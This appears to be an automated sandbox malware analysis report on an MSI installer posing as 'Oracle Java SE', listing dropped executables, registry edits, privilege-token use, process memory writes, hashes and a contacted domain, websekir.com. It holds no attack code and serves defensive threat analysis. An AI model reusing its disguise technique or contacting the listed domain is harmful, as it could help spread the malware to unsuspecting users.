Malware Analysis Report

2024-12-07 14:30

Sample ID 241016-j8981a1dmg
Target 4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118
SHA256 f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9
Tags
discovery persistence privilege_escalation defense_evasion execution exploit
score
8/10

Table of Contents

  Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V15
  Analysis: static1
    Detonation Overview
    Signatures
  Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
  Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
8/10

SHA256

f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9

Threat Level: Likely malicious

The file 4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

discovery persistence privilege_escalation defense_evasion execution exploit

Command and Scripting Interpreter: PowerShell

Possible privilege escalation attempt

Modifies file permissions

Enumerates connected drives

Blocklisted process makes network request

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Executes dropped EXE

Drops file in Program Files directory

Drops file in Windows directory

Loads dropped DLL

System Location Discovery: System Language Discovery

Event Triggered Execution: Installer Packages

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Modifies registry class

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-16 08:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-16 08:21

Reported

2024-10-16 08:24

Platform

win7-20240729-en

Max time kernel

142s

Max time network

62s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\f77c948.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77c948.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f77c949.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICD4D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\f77c94b.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77c949.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICC41.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICC51.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico C:\Windows\system32\msiexec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84\ProductFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductIcon = "C:\\Windows\\Installer\\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\\Logo.ico" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\PackageName = "4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\PackageCode = "9CC889D6EA63DC94DA730B4082DA0DA1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Version = "134217999" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductName = "Oracle Java SE" C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\syswow64\MsiExec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 1924 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 1852 wrote to memory of 1924 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 1852 wrote to memory of 1924 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 1852 wrote to memory of 1924 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding F846D7892EC1A7F3C05386819156FEF4

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A7B7C43405B7DE54D4C7E4575FA51208 M Global\MSI0000

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe"

Network

Country  Destination      Domain                Proto
US       8.8.8.8:53       repository.certum.pl  udp
GB       2.18.63.21:80    repository.certum.pl  tcp
US       8.8.8.8:53       websekir.com          udp
N/A      127.0.0.1:49425  N/A                   tcp
N/A      127.0.0.1:49428  N/A                   tcp
N/A      127.0.0.1:49431  N/A                   tcp
N/A      127.0.0.1:49434  N/A                   tcp
N/A      127.0.0.1:49437  N/A                   tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabC812.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarC824.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8db417db00fe3cf55e2a3bfd7706c920
SHA1 fbfae63b218940b237ee915cc406bc98ad33bdab
SHA256 e815c0884eeda37b3ef35d1783284c70ed02673dba3956eb8a007caaae9e8f65
SHA512 86e7137c74e7522fb5a13b4f8473d8fbd57d90d3da6b54b0d0fc42d449f6f59887b8ad48b29779bbf3b3a5e89219bf874897aeac64a2718c539c38c6004f693c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6525274CBC2077D43D7D17A33C868C4F

MD5 d5e98140c51869fc462c8975620faa78
SHA1 07e032e020b72c3f192f0628a2593a19a70f069e
